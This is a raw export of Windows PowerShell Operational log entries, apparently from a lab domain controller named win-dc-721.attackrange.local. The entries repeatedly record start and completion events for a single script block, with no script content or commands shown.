RecordNumber=1470677
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470676
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470675
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470674
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470673
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470672
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470671
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470670
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470669
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470668
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470667
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470666
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470665
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470664
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470663
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470662
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470661
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470660
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470659
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470658
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470657
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470656
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470655
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470654
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470653
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470652
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470651
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470650
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470649
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470648
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470647
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470646
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470645
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470644
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470643
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470642
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470641
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470640
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470639
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470638
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470637
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470636
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470635
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470634
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470633
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470632
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470631
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470630
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470629
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470628
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470627
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470626
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470625
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470624
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470623
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
